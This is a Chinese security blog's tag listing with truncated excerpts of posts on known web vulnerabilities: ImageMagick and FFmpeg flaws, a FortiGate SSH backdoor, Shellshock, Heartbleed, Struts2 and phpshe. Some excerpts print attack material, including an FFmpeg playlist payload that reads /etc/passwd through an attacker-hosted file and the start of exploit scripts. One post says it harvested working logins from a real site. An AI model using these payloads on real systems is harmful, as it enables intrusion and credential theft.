记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

[tools]Secure Socket Funneling: SSF

Secure Socket Funneling (SSF) is a network tool and toolkit. It provides simple and efficient ways to forward data from multiple sockets (TCP or UDP) through a single secure TLS link to a remote computer. from:n0where Features: Local and remote TCP port forwarding Local and remote UDP port forwarding Local and remote SOCKS server Local and remote shell thro
发布时间:2016-09-02 03:20 | 阅读:135961 | 评论:0 | 标签:Web应用漏洞

ImageMagick popen()命令执行漏洞

前几天wooyun以及朋友圈被ImageMagick的远程命令执行漏洞(CVE-2016–3714)给刷屏了,今天又爆出了ImageMagick的另外一处命令执行漏洞。 老外对漏洞的说明原文如下: All existing releases of GraphicsMagick and ImageMagick support a file open syntax where if the first character of the file specification is a '|', then the remainder of the filename is passed to the shell for execution using the POSIX popen(3C) fu
发布时间:2016-05-31 01:10 | 阅读:134197 | 评论:0 | 标签:Web应用漏洞 ImageMagick命令执行漏洞 命令执行漏洞 漏洞

FFmpeg文件读取漏洞测试及利用

昨天经历过ImageMagick命令执行漏洞的洗礼之后,今天又有FFmpeg文件读取漏洞,真是激情的一周啊! 看了老外写的文章,大概理解的利用方式如下: #EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://www.nxadmin.com/header.m3u8|file:///etc/passwd #EXT-X-ENDLIST 以上内容保存成test.avi,是用来上传到被攻击服务器的。 #EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:, http://www.nxadmin.com? 以上内容保存成header.m3u8,将header.m3u8上传到你的服务器,然后把test.avi上传到攻击服
发布时间:2016-05-06 19:40 | 阅读:100459 | 评论:0 | 标签:Web应用漏洞 ffmpeg文件读取漏洞 安全测试 文件读取漏洞 渗透测试 漏洞

ImageMagick命令执行漏洞(CVE-2016–3714)利用及测试

ImageMagick命令执行漏洞(CVE-2016–3714) 5月3日,ImageMagick官方披露称,目前ImageMagick存在一处远程命令执行漏洞(CVE-2016–3714),当其处理的上传图片带有攻击代码时,可被远程执行任意代码,进而导致攻击者控制服务器。 ImageMagick是一款开源图片处理库,支持PHP、Ruby、NodeJS和Python等多种语言,使用非常广泛。包括PHP imagick、Ruby rmagick和paperclip以及NodeJS imagemagick等多个图片处理插件都依赖它运行。 著名的开源应用wordpress已经受此漏洞的影响,攻击者有上传图片的权限,就能直接获取wordpress应用服务器的管理权限。具体的测试方法参考 建议业务开发检查自身的web网
发布时间:2016-05-06 04:15 | 阅读:197624 | 评论:0 | 标签:Web应用漏洞 CVE-2016–3714 ImageMagick ImageMagick代码执行漏洞 ImageMag

FortiGate OS(飞塔系统) Version 4.x – 5.0.7 – SSH Backdoor

FortiGate是Fortinet公司的硬件防火墙品牌,防火墙用的系统应该就是FortiGate OS(飞塔系统),貌似公司创始人是华裔,看介绍是一家全球性的网络安全设备供应商,好霸气。 看国内转发的文章是说,是老外在twitter上发布的,看样子以后得多去twitter上瞅瞅了,贴上exploit-db上的利用payload,代码如下: #!/usr/bin/env python # SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 # Usage: ./fgt_ssh_backdoor.py <target-ip> import socket import select import sys import param
发布时间:2016-01-13 18:20 | 阅读:117112 | 评论:0 | 标签:Web应用漏洞 Fortigate OS SSH后门 fortigate系统SSH后门 渗透测试 飞塔系统SSH后门

Java代码审计基础(一)

本文重点是让大家了解JAVA代码审计的基础,会以漏洞示例的方式介绍JAVA代码中常见Web漏洞的形成和针对的修复方案,文章是在国外网站上看到的,因为在接触JAVA代码审计,感觉挺高大上的文章,很适合对JAVA代码审计感兴趣的童鞋找感觉之用,就根据自己的理解翻译了过来,拿去某平台投稿,被鄙视说太基础,就只好发自己的Blog上了。 SQL注入 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 漏洞示例: <%@page import="java.sql.*"%> <%@ page language="
发布时间:2015-04-27 00:20 | 阅读:246761 | 评论:0 | 标签:Web应用漏洞 java代码审计 java常见web漏洞 web安全 代码审计

Bash远程命令执行漏洞(CVE-2014-6271)分析利用

这几天Bash被爆存在远程命令执行漏洞(CVE-2014-6271),昨天参加完isc,晚上回家测试了一下,写了个python版本的测试小基本,贴上代码: #coding:utf-8 import urllib,httplib import sys,re,urlparse #author:nx4dm1n #website:http://www.nxadmin.com def bash_exp(url): urlsp=urlparse.urlparse(url) hostname=urlsp.netloc urlpath=urlsp.path conn=httplib.HTTPConnection(hostname) headers={"U
发布时间:2014-09-27 04:00 | 阅读:136927 | 评论:0 | 标签:Web应用漏洞 bash命令执行 bash命令执行漏洞 bash远程命令执行 CVE-2014-6271 命令执行漏洞

phpshe 1.2前台无需登录getshell

Autor:xfkxfx Website:http://www.wooyun.org/bugs/wooyun-2014-065479 ……………………….上面内容体现了博主的节操………………………………………………………. 存在漏洞的文件install/index.php,整个过程没有判断install.lock,导致可以重复安装,同是在安装的过程中,对配置
发布时间:2014-07-30 19:05 | 阅读:111996 | 评论:0 | 标签:Web应用漏洞 phpshe 1.2漏洞 phpshe getshell phpshe 漏洞 phpshe任意代码写入

Struts2 DDOS和远程命令执行(S2-020补丁绕过)-猜想

Struts2 s2-020 DDOS和远程命令执行漏洞官方发布了补丁,昨天又有童鞋发现了绕过补丁的方式,关于该Struts2 s2-020 DDOS和远程命令执行漏洞的细节可以看一下wooyun zone Nebula发布的一篇文章,地址是:http://drops.wooyun.org/papers/1377 参考Nebula发的这篇文章和4月24号南京翰海源发布经过打码的绕过该漏洞的方式,原文: http://blog.vulnhunt.com/index.php/2014/04/24/apache_struts2_0day/ 文章结尾有完美修复此漏洞的方案,内容如下: —————————̵
发布时间:2014-04-24 14:45 | 阅读:149276 | 评论:0 | 标签:Web应用漏洞 s2-020补丁绕过 s2-020远程命令执行 struts2 ddos struts2 s2-020补

批量检测openssl(心脏出血)漏洞(新手学python)

最近openssl(心脏滴血)漏洞挺火的,貌似这几天看到微博上有人说没多少危害之类的,不过根据亲测,发现危害还是比较大的。 所以找了个站,用for循环,批量抓了100个文件,大概10分钟左右完成,查找帐号和密码大概有10个左右,测试基本都是可以登录的,如果是访问量大的网站,可能段时间内能抓到更多!自己利用现有EXP写了个方便批量检测该漏洞的,主要是练手python,感觉不练进步太慢。贴上代码: #coding:utf-8 import subprocess import time #遍历目标文件中的URL def readtar(targetpath): f=open(targetpath,"r") for url in f.readlines():
发布时间:2014-04-13 07:55 | 阅读:134304 | 评论:0 | 标签:Web应用漏洞 openssl漏洞 ssltest 心脏出血漏洞 心脏滴血漏洞 批量检测 漏洞检测 漏洞

Web安全之常见漏洞测试及修复方法

朋友总结的一个PDF,总结了常见漏洞的测试方法、危害及修复方案。个人感觉很实用,很经典,分享出来,供大家学习参考之用。 PDF地址:http://www.0day.cc/Security-Hidden-danger-list.pdf  
发布时间:2014-04-03 04:20 | 阅读:95406 | 评论:0 | 标签:Web应用漏洞 web安全 web常见漏洞 web漏洞 web漏洞修复 web漏洞总结 漏洞

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云